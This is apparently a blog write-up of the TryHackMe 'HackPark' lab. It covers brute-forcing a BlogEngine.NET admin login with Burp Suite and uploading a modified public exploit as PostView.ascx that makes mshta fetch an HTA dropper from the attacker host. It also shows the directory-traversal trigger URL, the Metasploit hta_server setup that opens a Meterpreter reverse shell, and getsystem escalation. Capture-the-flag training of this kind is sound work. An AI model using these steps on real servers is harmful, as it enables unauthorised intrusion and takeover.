<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe writeup: HackPark</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe writeup: HackPark</h1>
</header>
<section data-field="subtitle" class="p-summary">
Join me as I break the rules for a TryHackMe room in the most psychotic and not even wrong way. Feat. Burp Suite, Metasploit and Ava Max!
</section>
<section data-field="body" class="e-content">
<section name="fb4d" class="section section--body section--first section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="5d6a" id="5d6a" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: HackPark</h3><p name="2523" id="2523" class="graf graf--p graf-after--h3">HackPark (<a href="https://tryhackme.com/room/hackpark" data-href="https://tryhackme.com/room/hackpark" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme”, 2019</a>) is a TryHackMe tutorial room that has the user “[b]ruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine” (quoted verbatim from <a href="https://tryhackme.com/room/hackpark" data-href="https://tryhackme.com/room/hackpark" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Ibid</a>). This was an interesting room (for me at least). It took me nearly a month to finish this room because of my tendency to “break the rules,” but finish it I did. I will discuss my experience with this room in this article.</p><figure name="1c2e" id="1c2e" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*aBdY6R4sGVsbTGvRzxwTxA.png" data-width="882" data-height="669" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*aBdY6R4sGVsbTGvRzxwTxA.png"><figcaption class="imageCaption">Base Image: <a href="https://www.youtube.com/watch?v=WXBHCQYxwr0" data-href="https://www.youtube.com/watch?v=WXBHCQYxwr0" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">“Ava Max” (2018)</a></figcaption></figure><h3 name="b539" id="b539" class="graf graf--h3 graf-after--figure">Procedure</h3><p name="7725" id="7725" class="graf graf--p graf-after--h3">Before I begin, I must define the objective of this room. In this case to exploit vulnerabilities on the target system to get a lesser-privileged user account and then exploit a privilege escalation vulnerability to get SYSTEM level privileges. I must then dump the <code class="markup--code markup--p-code">user.txt</code> and <code class="markup--code markup--p-code">root.txt</code> flags.</p><p name="e591" id="e591" class="graf graf--p graf-after--p">So, I clicked on the green-coloured “start machine” button on the top-right part of the first task and proceeded to add the target machine’s dynamic IP address onto my AttackBox’s <code class="markup--code markup--p-code">/etc/hosts</code> configuration file.</p><h4 name="2b3c" id="2b3c" class="graf graf--h4 graf-after--p">Reconnaissance</h4><p name="a616" id="a616" class="graf graf--p graf-after--h4">This room is running a web server, so I ran Burp Suite (<a href="https://portswigger.net/burp/communitydownload" data-href="https://portswigger.net/burp/communitydownload" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">PortSwigger, n.d.-a</a>) and visited the target’s website with its built in browser. The following (Fig. 1) is what comes up in the homepage:</p><figure name="fe9e" id="fe9e" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*aeNflb5LY6PUouIfDc2eZQ.png" data-width="907" data-height="692" src="https://cdn-images-1.medium.com/max/800/1*aeNflb5LY6PUouIfDc2eZQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 1</strong></figcaption></figure><p name="f8a5" id="f8a5" class="graf graf--p graf-after--figure">As part of a passive reconnaissance job, the contender is to work out who the clown like figure (Fig 1a) is on the homepage. Through a reverse image search and context clues, I was able to work out the clown’s name.</p><p name="7d39" id="7d39" class="graf graf--p graf-after--p">After that, I looked for a way to exploit the facing web application to gain access to the administrator panel. The three horizontal stripes on the top-right corner of the home page (Fig. 1b) seems to be a button for some kind of site navigation toolbar. Clicking on it gives the following menu pane (Fig. 2):</p><figure name="4a78" id="4a78" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*2_AujaYewB986I08JcDauA.png" data-width="621" data-height="452" src="https://cdn-images-1.medium.com/max/800/1*2_AujaYewB986I08JcDauA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 2</strong></figcaption></figure><p name="fd7e" id="fd7e" class="graf graf--p graf-after--figure">I am interested in getting into a login page so that I can try my hand at exploiting the system with some kind of file upload vulnerability with the short term goal of establishing a Meterpreter (<a href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" data-href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Metasploit Unleashed, n.d.</a>) session. Clicking on “LOG IN” (Fig. 2a) give me the following page (Fig. 3):</p><figure name="fea7" id="fea7" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*wiUvHSCeJbWxtnpfz4DZ8g.png" data-width="865" data-height="608" src="https://cdn-images-1.medium.com/max/800/1*wiUvHSCeJbWxtnpfz4DZ8g.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 3</strong></figcaption></figure><p name="3756" id="3756" class="graf graf--p graf-after--figure">The content management system that is powering this website is called <a href="https://blogengine.io/" data-href="https://blogengine.io/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">BlogEngine.NET (n.d.)</a> and before I go on exploiting it, I figured that I would try to log in to the thing first.</p><p name="3fe1" id="3fe1" class="graf graf--p graf-after--p">The login form takes in a username (Fig. 3a) and a password (Fig. 3b). I used <code class="markup--code markup--p-code">dna</code> as the username and <code class="markup--code markup--p-code">deniers</code> as the password, clicked “LOG IN” (Fig. 3c) and got the following page (Fig. 4):</p><figure name="7473" id="7473" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*_oMjGxLFsOVOcR0GCVjFlQ.png" data-width="833" data-height="650" src="https://cdn-images-1.medium.com/max/800/1*_oMjGxLFsOVOcR0GCVjFlQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 4</strong></figcaption></figure><p name="e991" id="e991" class="graf graf--p graf-after--figure">As I expected, the login would fail (Fig. 4a). Burp Suite logged these requests and responses, and I can now use them to perform a brute force attack against the panel to obtain credentials. Switching to Burp Suite main window (Fig. 5), I worked out the <strong class="markup--strong markup--p-strong">POST</strong> request representing the failed login (Fig. 5a) and then forwarded it to Burp’s <em class="markup--em markup--p-em">Intruder</em> feature (Fig. 5b):</p><figure name="e70d" id="e70d" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*_HVY4Dvo_xoKDIJeHdkA-Q.png" data-width="889" data-height="401" src="https://cdn-images-1.medium.com/max/800/1*_HVY4Dvo_xoKDIJeHdkA-Q.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 5</strong></figcaption></figure><p name="2826" id="2826" class="graf graf--p graf-after--figure">I do not want to discuss the specifics regarding configuring Burp Suite to brute force a web form, as that will take longer than needed, but I do want to focus on this particular field in the <em class="markup--em markup--p-em">POST</em> request:</p><pre name="0607" id="0607" class="graf graf--pre graf-after--p">[...] &amp;ctl00%24MainContent%24LoginUser%24UserName=<strong class="markup--strong markup--pre-strong">§dna§</strong>&amp;ctl00%24MainContent%24LoginUser%24Password=<strong class="markup--strong markup--pre-strong">§deniers§</strong>&amp; [...]</pre><p name="cb9f" id="cb9f" class="graf graf--p graf-after--pre">I will brute force the web application with the <em class="markup--em markup--p-em">Cluster Bomb </em>(<a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types" data-href="https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">PortSwigger, n.d.-b</a>) attack where Burp Suite will try to login using a various username and password combinations. I recommend reading the manual (<a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types" data-href="https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Ibid.</a>) to learn more about setting up this kind of attack.</p><p name="7265" id="7265" class="graf graf--p graf-after--p">But regarding this particular <em class="markup--em markup--p-em">POST</em> field, I can see configure Burp Suite to attack the <code class="markup--code markup--p-code">&amp;ctl00%24MainContent%24LoginUser%24UserName=</code> and <code class="markup--code markup--p-code">ctl00%24MainContent%24LoginUser%24Password=</code> parameters, which both represent the username and password fields respectively. I then need to configure the payloads to match a list of common username and common passwords, and then launch the attack. The following window (Fig. 6) shows the brute force in action:</p><figure name="b4c1" id="b4c1" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*F9f-0aOsRfjh_h-DHHsNaA.png" data-width="905" data-height="476" src="https://cdn-images-1.medium.com/max/800/1*F9f-0aOsRfjh_h-DHHsNaA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 6</strong></figcaption></figure><p name="92c3" id="92c3" class="graf graf--p graf-after--figure">Burp Suite is trying to login with different passwords and different usernames for each password. The results tab (Fig. 6a) shows what Burp Suite has tried. The <code class="markup--code markup--p-code">Payload1</code> column (Fig. 6b) shows usernames tested,<code class="markup--code markup--p-code">Payload2</code> column (Fig. 6c) shows passwords tested, <code class="markup--code markup--p-code">Status</code> column shows the HTTP response code after the payload was tried and <code class="markup--code markup--p-code">Length</code> column shows the size of the response (in bytes I think?).</p><p name="1925" id="1925" class="graf graf--p graf-after--p">The <code class="markup--code markup--p-code">Status</code> and <code class="markup--code markup--p-code">Length</code> columns are important because I am looking for anomalies in the response. A different HTTP response code (like 3xx or 4xx), or larger or smaller size in response could indicate that Burp Suite found a username and password combination that is successful. My line of reasoning for this is that it is probabilistically more likely that incorrect username and password combinations will produce similar “login failed” responses and a unique username and password will produce a novel “login succeeded” response size or HTTP response code.</p><p name="57b7" id="57b7" class="graf graf--p graf-after--p">This process for a while and got eventually, I got the following candidate for a username and password combination: a username of <code class="markup--code markup--p-code">admin</code> and a password of <code class="markup--code markup--p-code">1qaz2wsx</code>. I tried to log in to the application <em class="markup--em markup--p-em">a la</em> Fig. 4 and was presented with BlogEngine.NET’s administrator dashboard (Fig. 7):</p><figure name="7287" id="7287" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*wY3ZONRZAXfNFyzqh9wgkw.png" data-width="1365" data-height="779" src="https://cdn-images-1.medium.com/max/800/1*wY3ZONRZAXfNFyzqh9wgkw.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 7</strong></figcaption></figure><h4 name="639e" id="639e" class="graf graf--h4 graf-after--figure">Initial access</h4><p name="d3fc" id="d3fc" class="graf graf--p graf-after--h4">With access to the BlogEngine.NET dashboard of the target machine, I can now begin to think of ways to exploit the panel. I think that it would be useful to first work out what version of BlogEngine that the target machine is running. I worked out by clicking on the “[a]bout” button on the left toolbar (Fig. 8c) and the version was listed as <code class="markup--code markup--p-code">3.3.6.0</code>.</p><figure name="9ce1" id="9ce1" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*PC9_CILWQF8sFPqd3QLKcA.png" data-width="1076" data-height="618" src="https://cdn-images-1.medium.com/max/800/1*PC9_CILWQF8sFPqd3QLKcA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 8</strong></figcaption></figure><p name="a566" id="a566" class="graf graf--p graf-after--figure">A cursory research job that I did regarding what kind of vulnerabilities are in the BlogEngine <code class="markup--code markup--p-code">3.3.6.0</code> brought my attention to a report written by <a href="https://seclists.org/fulldisclosure/2019/Jun/26" data-href="https://seclists.org/fulldisclosure/2019/Jun/26" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Bishop (2019)</a> demonstrating a <em class="markup--em markup--p-em">Local File Inclusion</em> and <em class="markup--em markup--p-em">Remote Code Execution</em> bug that affects BlogEngine <code class="markup--code markup--p-code">3.3.6.0</code> and prior versions.</p><p name="ee9c" id="ee9c" class="graf graf--p graf-after--p">Furthermore, a practical exploit was made by <a href="https://www.exploit-db.com/exploits/46353" data-href="https://www.exploit-db.com/exploits/46353" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Cobb (2019)</a>. The original exploit opens up a reverse shell to the AttackBox, but I figured that I would “break the rules” a bit and modify the exploit to do something more interesting (and convenient for myself).</p><p name="5c07" id="5c07" class="graf graf--p graf-after--p">I modified the original exploit to instead launch an HTML Application-driven payload (see <a href="https://docs.microsoft.com/en-us/previous-versions/ms536495%28v=vs.85%29" data-href="https://docs.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Microsoft Docs, 2013</a>), which can be configured to automatically initiate a reverse Meterpreter shell. I initially modified the exploit to launch a <code class="markup--code markup--p-code">web_delivery</code> vehicle to deliver a reverse shell, but when the listener that I have set up got a connection, a shell was not spawned for some reason.</p><p name="69e4" id="69e4" class="graf graf--p graf-after--p">So I then tried a bunch of alternative ways to launch the code and decided to take a break. It was not until that I did another TryHackMe room (<a href="https://infosecwriteups.com/tryhackme-writeup-atlas-c3dff235d109" data-href="https://infosecwriteups.com/tryhackme-writeup-atlas-c3dff235d109" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Aleksey, 2022</a>) that I realised that the <code class="markup--code markup--p-code">web_delivery</code> payload was failing in general, so I had to work out another means to deliver the Meterpreter payload. I used a technique described by <a href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" data-href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Chandel (2019)</a> that uses HTA as a delivery mechanism. The following is my implementation of Cobb’s exploit:</p><figure name="c2f6" id="c2f6" class="graf graf--figure graf--iframe graf-after--p"><script src="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb?file=ctf.2022.tryhackme.hackpark.bexploit.cs.js"></script><figcaption class="imageCaption">My version of Cobb’s exploit (<a href="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb#file-ctf-2022-tryhackme-hackpark-bexploit-cs" data-href="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb#file-ctf-2022-tryhackme-hackpark-bexploit-cs" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">Aleksey, n.d.</a>)</figcaption></figure><p name="e0ed" id="e0ed" class="graf graf--p graf-after--figure">Rather than creating a reverse shell with the .NET framework’s socket programming libraries, my version of Cobb’s exploit will instead access a remote HTML application through launching a process (Ln. 25, 30). Specifically, it will do so with the <code class="markup--code markup--p-code">mshta.exe</code> executable (Ln. 26, 27) and create no window (Ln. 29) to hopefully “stay hidden.”</p><p name="39c4" id="39c4" class="graf graf--p graf-after--p"><strong class="markup--strong markup--p-strong">Note</strong> that I have <strong class="markup--strong markup--p-strong">not</strong> tested this rudimentary kind of stealth, so it may not be appropriate or work “as effectively” in a real life situation. Nonetheless, it did work for me in this room, so I went with it.</p><p name="2306" id="2306" class="graf graf--p graf-after--p">I then proceeded to exploit this vulnerability by uploading the exploit onto the <em class="markup--em markup--p-em">BlogEngine CMS</em>. The file needs to be uploaded with the filename <code class="markup--code markup--p-code">PostView.ascx</code> in order for the exploit to be triggered. So I made a copy of it under that name:</p><pre name="c736" id="c736" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/hackpark]<br>└─$ cp bexploit.cs PostView.ascx</strong><br>                                                                                                                                  <br><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/hackpark]<br>└─$</strong></pre><p name="c5de" id="c5de" class="graf graf--p graf-after--pre">Then, I proceeded to launch Metasploit to handle the incoming Meterpreter reverse shell:</p><pre name="8838" id="8838" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/hackpark]<br>└─$ sudo msfconsole                    <br>[sudo] password for dna: *inserts password*</strong></pre><pre name="9bd0" id="9bd0" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 &gt; use exploit/windows/misc/hta_server</strong><br>[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp</pre><pre name="18a6" id="18a6" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; set LHOST &lt;attackbox ip&gt;</strong><br>LHOST =&gt; &lt;attackbox ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; exploit</strong><br>[*] Exploit running as background job 0.<br>[*] Exploit completed, but no session was created.</pre><pre name="262e" id="262e" class="graf graf--pre graf-after--pre">[*] Started reverse TCP handler on &lt;attackbox ip&gt;:4444 <br>[*] Using URL: http://&lt;attackbox ip&gt;:8080/dropper.hta<br>[*] Server started.<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt;</strong></pre><p name="54d2" id="54d2" class="graf graf--p graf-after--pre">I then edited the <code class="markup--code markup--p-code">PostView.ascx</code> file with the argument that leads to the Meterpreter HTML application on my AttackBox (Ln. 27):</p><pre name="deb9" id="deb9" class="graf graf--pre graf-after--p">[... snip ...]<br>payload.StartInfo.Arguments = <strong class="markup--strong markup--pre-strong">&quot;http://&lt;attackbox ip&gt;:8080/dropper.hta&quot;</strong>; // url to HTA with payload<br>[... snip ...]</pre><p name="6d6c" id="6d6c" class="graf graf--p graf-after--pre">I uploaded the exploit into the CMS by first going to the content section (Fig. 8a) which will give me a list of articles published on the website. I then went to the “Welcome to HackPark” article (Fig. 8b), which gave me the following webpage (Fig. 9):</p><figure name="e43c" id="e43c" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*PiEKupZrNfBI0E6rVCJw4w.png" data-width="671" data-height="653" src="https://cdn-images-1.medium.com/max/800/1*PiEKupZrNfBI0E6rVCJw4w.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 9</strong></figcaption></figure><p name="eafd" id="eafd" class="graf graf--p graf-after--figure">I need to upload the <code class="markup--code markup--p-code">PostView.ascx</code> file onto the server. This is accomplished by clicking on the button with the folder icon (Fig. 9a) which brings up the following dialog (Fig. 10):</p><figure name="32b8" id="32b8" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*77AIRzBp_8t5j2clTo9UgQ.png" data-width="1029" data-height="473" src="https://cdn-images-1.medium.com/max/800/1*77AIRzBp_8t5j2clTo9UgQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 10</strong></figcaption></figure><p name="5b0a" id="5b0a" class="graf graf--p graf-after--figure">I clicked on the “Upload” button (Fig. 10a) and another dialog came up where I have to select the <code class="markup--code markup--p-code">PostView.ascx</code> file to upload, which I did and got the following as a result informing me that I was successful (Fig. 11a/b):</p><figure name="acf3" id="acf3" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*7uAJ0L2gCSIXQMIC2i7NyQ.png" data-width="1012" data-height="597" src="https://cdn-images-1.medium.com/max/800/1*7uAJ0L2gCSIXQMIC2i7NyQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 11</strong></figcaption></figure><p name="b3f4" id="b3f4" class="graf graf--p graf-after--figure">I then triggered the exploit by visiting the following URL: <code class="markup--code markup--p-code">http://hackpark.thm/?theme=../../App_Data/files</code> from my AttackBox’s browser and got the following page:</p><figure name="c81b" id="c81b" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*36UYwXACml2QQW9rPiHz0g.png" data-width="877" data-height="510" src="https://cdn-images-1.medium.com/max/800/1*36UYwXACml2QQW9rPiHz0g.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 12</strong></figcaption></figure><p name="299f" id="299f" class="graf graf--p graf-after--figure">After that, a Meterpreter session from the target machine came my way:</p><pre name="1134" id="1134" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt;</strong> [*] hackpark.thm    hta_server - Delivering Payload<br>[*] Sending stage (175174 bytes) to hackpark.thm<br>[*] Meterpreter session 1 opened (&lt;attackbox ip&gt;:4444 -&gt; hackpark.thm:49423 ) at [redacted] -0400</pre><pre name="6a73" id="6a73" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt;</strong></pre><h4 name="5c76" id="5c76" class="graf graf--h4 graf-after--pre">Post-exploitation</h4><p name="0c40" id="0c40" class="graf graf--p graf-after--h4">After exploiting the target machine and getting that Meterpreter reverse shell, I began to interact with it and automatically get SYSTEM privileges with <code class="markup--code markup--p-code">getsystem</code>:</p><pre name="b2a4" id="b2a4" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; sessions -i 1</strong><br>[*] Starting interaction with 1...</pre><pre name="5378" id="5378" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt; getsystem</strong><br>...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).<br><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="62c9" id="62c9" class="graf graf--p graf-after--pre"><strong class="markup--strong markup--p-strong">Note that</strong> I was supposed to exploit a service to get SYSTEM privileges, but that is what the room was expecting, and like a good comedy, I enjoy writing in such a manner that challenges my readers “second-guessing.” 😉</p><p name="7425" id="7425" class="graf graf--p graf-after--p">Now I can proceed to dump the user and root flags from the system:</p><pre name="6280" id="6280" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; search -f user.txt</strong><br>Found 2 results...<br>==================</pre><pre name="a60e" id="a60e" class="graf graf--pre graf-after--pre">Path  Size (bytes)  Modified (UTC)<br>----  ------------  --------------<br>c:\Documents and Settings\jeff\Desktop\user.txt  32            [redacted] -0400<br>c:\Users\jeff\Desktop\user.txt                   32            [redacted] -0400</pre><pre name="8fc1" id="8fc1" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt; cat C:\\Users\\jeff\\Desktop\\user.txt</strong><br>[redacted]<strong class="markup--strong markup--pre-strong">meterpreter &gt; search -f root.txt</strong><br>Found 2 results...<br>==================</pre><pre name="4609" id="4609" class="graf graf--pre graf-after--pre">Path  Size (bytes)  Modified (UTC)<br>----  ------------  --------------<br>c:\Documents and Settings\Administrator\Desktop\root.txt  32            [redacted] -0400<br>c:\Users\Administrator\Desktop\root.txt                   32            [redacted] -0400</pre><pre name="4e57" id="4e57" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt; cat C:\\Users\\Administrator\\Desktop\\root.txt</strong><br>[redacted]<strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="028f" id="028f" class="graf graf--p graf-after--pre">Allora.</p><h3 name="2b84" id="2b84" class="graf graf--h3 graf-after--p">Summary</h3><p name="5d0a" id="5d0a" class="graf graf--p graf-after--h3">This was an interesting room. As usual, I rebelled against the instructions and decided to use Burp Suite instead of <code class="markup--code markup--p-code">hydra</code>(in part because I could not work out how to get <code class="markup--code markup--p-code">hydra</code> to attack BlogEngine.NET’s login form), rewrite the payload of the exploit to be employed and decided to end with a whimper by using <code class="markup--code markup--p-code">getsystem</code> instead of a manual exploitation of the vulnerable service to be exploited.</p><h4 name="fded" id="fded" class="graf graf--h4 graf-after--p">Takeaways</h4><p name="d196" id="d196" class="graf graf--p graf-after--h4">Not much to “take away” from this writeup, other than the vulnerability discovered by <a href="https://seclists.org/fulldisclosure/2019/Jun/26" data-href="https://seclists.org/fulldisclosure/2019/Jun/26" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Bishop (2019)</a> and more reason to believe that breaking the rules is a good thing ;-)</p><h4 name="5d3b" id="5d3b" class="graf graf--h4 graf-after--p">Plug</h4><p name="b61c" id="b61c" class="graf graf--p graf-after--h4">Mira Lazine (<a href="https://twitter.com/MiraLazine" data-href="https://twitter.com/MiraLazine" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Twitter</a>, <a href="https://medium.com/@MiraLazine" data-href="https://medium.com/@MiraLazine" class="markup--anchor markup--p-anchor" target="_blank">Medium</a>) and other disadvantaged persons need your help. If you can, donate to themselves on the following links:</p><ul class="postList"><li name="8381" id="8381" class="graf graf--li graf-after--p">Mira on Cash.App: <a href="https://cash.app/$MiraLazine" data-href="https://cash.app/$MiraLazine" class="markup--anchor markup--li-anchor" rel="nofollow noopener" target="_blank">https://cash.app/$MiraLazine</a></li><li name="476d" id="476d" class="graf graf--li graf-after--li">Izzy on Cash.App: <a href="https://cash.app/$izzykilla" data-href="https://cash.app/$izzykilla" class="markup--anchor markup--li-anchor" rel="nofollow noopener" target="_blank">https://cash.app/$izzykilla</a></li><li name="6758" id="6758" class="graf graf--li graf-after--li">Dee W. on Cash.App: <a href="https://cash.app/$pitfirego" data-href="https://cash.app/$pitfirego" class="markup--anchor markup--li-anchor" rel="nofollow noopener" target="_blank">https://cash.app/$pitfirego</a></li><li name="21dc" id="21dc" class="graf graf--li graf-after--li">Dee W. on Venmo: <a href="https://account.venmo.com/u/Spitfirego" data-href="https://account.venmo.com/u/Spitfirego" class="markup--anchor markup--li-anchor" rel="nofollow noopener" target="_blank">https://account.venmo.com/u/Spitfirego</a></li><li name="7b37" id="7b37" class="graf graf--li graf-after--li">Jean Gou on Cash.App: <a href="https://cash.app/$octgayvian" data-href="https://cash.app/$octgayvian" class="markup--anchor markup--li-anchor" rel="nofollow noopener noopener" target="_blank">https://cash.app/$octgayvian</a></li></ul><p name="8430" id="8430" class="graf graf--p graf-after--li">They are all in need of financial assistance, so if you can spare a few dollars for them (or spread the word), that would be much appreciated 😍</p><h3 name="3ca8" id="3ca8" class="graf graf--h3 graf-after--p">References</h3><p name="8ca5" id="8ca5" class="graf graf--p graf-after--h3">Aleksey (2022). <em class="markup--em markup--p-em">TryHackMe writeup: Atlas</em>. InfoSec Write-ups. Retrieved on May 18, 2022 from: <a href="https://infosecwriteups.com/tryhackme-writeup-atlas-c3dff235d109" data-href="https://infosecwriteups.com/tryhackme-writeup-atlas-c3dff235d109" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://infosecwriteups.com/tryhackme-writeup-atlas-c3dff235d109</a></p><p name="fc05" id="fc05" class="graf graf--p graf-after--p">Aleksey (n.d.). <em class="markup--em markup--p-em">A gist of my Medium code snippets</em>. GitHub Gists. Retrieved on May 13, 2022 from: <a href="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb#file-ctf-2022-tryhackme-hackpark-bexploit-cs" data-href="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb#file-ctf-2022-tryhackme-hackpark-bexploit-cs" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb#file-ctf-2022-tryhackme-hackpark-bexploit-cs</a></p><p name="2e33" id="2e33" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“Ava Max” (2018). <em class="markup--em markup--p-em">Sweet but Psycho [Official Music Video]</em>. YouTube. Retrieved on May 24, 2022 from: <a href="https://youtu.be/WXBHCQYxwr0" data-href="https://youtu.be/WXBHCQYxwr0" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://youtu.be/WXBHCQYxwr0</a></p><p name="9d8b" id="9d8b" class="graf graf--p graf-after--p">Bishop, A. (2019). <em class="markup--em markup--p-em">BlogEngine.NET Directory traversal + RCE</em>. SecLists. Retrieved on May 9, 2022 from: <a href="https://seclists.org/fulldisclosure/2019/Jun/26" data-href="https://seclists.org/fulldisclosure/2019/Jun/26" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener" target="_blank">https://seclists.org/fulldisclosure/2019/Jun/26</a></p><p name="4fb5" id="4fb5" class="graf graf--p graf-after--p">BlogEngine.NET (n.d.). <em class="markup--em markup--p-em">BlogEngine.NET | Free blogging platform</em>. Retrieved on May 7, 2022 from: <a href="https://blogengine.io/" data-href="https://blogengine.io/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://blogengine.io/</a></p><p name="7879" id="7879" class="graf graf--p graf-after--p">Chandel, R. (2019). <em class="markup--em markup--p-em">Get Reverse-shell via Windows one-liner</em>. Hacking Articles. Retrieved on Apr. 24, 2022 from: <a href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" data-href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" class="markup--anchor markup--p-anchor" rel="noopener ugc nofollow noopener noopener" target="_blank">https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/</a></p><p name="1fe9" id="1fe9" class="graf graf--p graf-after--p">Cobb, D. (2019). <em class="markup--em markup--p-em">BlogEngine.NET &lt;= 3.3.6 Directory Traversal RCE</em>. Exploit Database. Retrieved on Apr. 25, 2022 from: <a href="https://www.exploit-db.com/exploits/46353" 